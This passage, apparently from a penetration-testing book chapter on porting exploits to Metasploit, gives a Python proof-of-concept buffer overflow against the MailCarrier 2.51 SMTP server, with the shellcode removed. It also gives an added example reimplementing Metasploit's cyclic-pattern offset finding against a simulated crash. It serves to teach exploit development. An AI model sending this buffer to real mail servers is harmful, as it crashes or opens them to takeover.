
Porting Exploits to the Metasploit Framework

217

But this is an older exploit, originally written for Windows 2000. When you run it now, it doesn't work quite as you'd expect. Conveniently, a Metasploit module is already in the Framework to implement this exploit, although it could use some improvement. After a little time investigating with varying buffer lengths, you will find that more than 1000 bytes are available for shellcode, and the buffer length needs to be adjusted by 4 bytes. (For more information on how this is accomplished, read "Exploit Writing Tutorial Part 1: Stack Based Overflows," at http://www.exploit-db.com/download_pdf/13535/.) The new proof of concept for this exploit follows. We have removed the shellcode and replaced the return address with four marker bytes (\x42, or BBBB) so that the EIP register is overwritten with a value we can recognize in the debugger. (Proof of concept exploits contain the basic code necessary to demonstrate the exploit but do not carry an actual payload, and in many cases they require heavy modifications before they will work properly.)

#!/usr/bin/env python3
#########################################################
# MailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow     #
# Advanced, secure and easy to use Mail Server.         #
# 23 Oct 2004 - muts                                    #
#########################################################
# Proof of concept only: the shellcode has been removed and EIP is
# overwritten with a marker value. Updated here to Python 3 syntax
# (bytes literals, print() calls); the buffer layout is unchanged.

import socket

print("\n\n###############################################")
print("\nMailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow")
print("\nFound & coded by muts [at] whitehat.co.il")
print("\nFor Educational Purposes Only!\n")
print("\n\n###############################################")

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

buffer = b"\x41" * 5093    # padding up to the saved return address
buffer += b"\x42" * 4      # "BBBB": the 4 bytes that land in EIP
                           # (the original read "\42", an octal escape for '"')
buffer += b"\x90" * 32     # NOP sled
buffer += b"\xcc" * 1000   # INT3 filler where the shellcode will go

try:
    print("\nSending evil buffer...")
    s.connect(('192.168.1.155', 25))
    s.send(b'EHLO ' + buffer + b'\r\n')
    data = s.recv(1024)
    s.close()
    print("\nDone!")
except socket.error:
    print("Could not connect to SMTP!")
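The "investigating with varying buffer lengths" step above is what Metasploit's pattern_create.rb and pattern_offset.rb automate: send a cyclic pattern in which every 4-byte window is unique, read the value the debugger reports in EIP, and look those bytes up to get the exact distance to the saved return address. The following is an added example, not code from the book or from muts's exploit; it reimplements that technique in Python (the pattern order Aa0Aa1Aa2... matches Metasploit's), and replaces the real crash with a constructed simulate_overflow() helper that returns the 4 bytes sitting at a chosen offset, so it runs offline. The offset 5093 and the 0x42 / 0x90 / 0xCC layout are taken from the proof of concept above.

```python
import string
import struct

# Character sets in the order Metasploit's pattern_create.rb walks them.
UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
DIGITS = string.digits
PERIOD = len(UPPER) * len(LOWER) * len(DIGITS) * 3  # 20280 bytes per cycle


def pattern_create(length):
    """Return `length` bytes of the cyclic pattern Aa0Aa1Aa2...Aa9Ab0Ab1...

    Within one period every 4-byte window is unique, so the 4 bytes that
    land on the saved return address identify their offset exactly.
    """
    if not 0 < length <= PERIOD:
        raise ValueError("length must be between 1 and %d bytes" % PERIOD)
    full = "".join(u + l + d for u in UPPER for l in LOWER for d in DIGITS)
    return full[:length].encode("ascii")


def pattern_offset(eip, length=PERIOD):
    """Find where the bytes that ended up in EIP sit in the pattern.

    `eip` is either the 32-bit value the debugger shows (an int; the x86
    stack is little-endian, so 0x386e4737 means the bytes b"7Gn8" were in
    that slot) or those 4 bytes themselves. Returns -1 if the value is not
    in the pattern, which usually means EIP was not overwritten by our data.
    """
    if isinstance(eip, int):
        needle = struct.pack("<I", eip)
    elif isinstance(eip, str):
        needle = eip.encode("ascii")
    else:
        needle = bytes(eip)
    return pattern_create(length).find(needle)


def simulate_overflow(buf, saved_eip_offset):
    """Constructed stand-in for the crash (hypothetical, not a real target):
    a debugger would report EIP as the 4 bytes of `buf` that overwrote the
    saved return address, read as a little-endian dword."""
    return struct.unpack("<I", buf[saved_eip_offset:saved_eip_offset + 4])[0]


def build_poc_buffer(offset, eip_marker=b"\x42" * 4, nop_len=32, payload_len=1000):
    """Lay out the buffer the way the proof of concept on this page does:
    padding up to the saved return address, 4 marker bytes for EIP, a NOP
    sled, then INT3 (0xCC) filler where real shellcode would go."""
    return b"\x41" * offset + eip_marker + b"\x90" * nop_len + b"\xcc" * payload_len


if __name__ == "__main__":
    # 1. Send a pattern long enough to crash the target (here a simulated
    #    frame whose saved EIP sits 5093 bytes in, as in the page's PoC).
    probe = pattern_create(6000)
    crashed_eip = simulate_overflow(probe, 5093)
    print("EIP reported by debugger: 0x%08x" % crashed_eip)

    # 2. Turn that value back into an offset.
    offset = pattern_offset(crashed_eip)
    print("offset to saved EIP: %d" % offset)

    # 3. Rebuild the buffer with the marker at that offset and confirm the
    #    marker, not the padding, is what lands in EIP.
    poc = build_poc_buffer(offset)
    print("marker in EIP: 0x%08x" % simulate_overflow(poc, offset))
```

If pattern_offset() returns -1 the value in EIP did not come from your pattern: either the overflow never reached the return address at that length, or the crash happened somewhere else (an exception handler or a different frame), which is the first thing to check before adjusting the buffer by a few bytes.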

As you might imagine, the easiest and fastest way to port a stand-alone exploit to Metasploit is to modify a similar one from the Framework. And that's what we'll do next.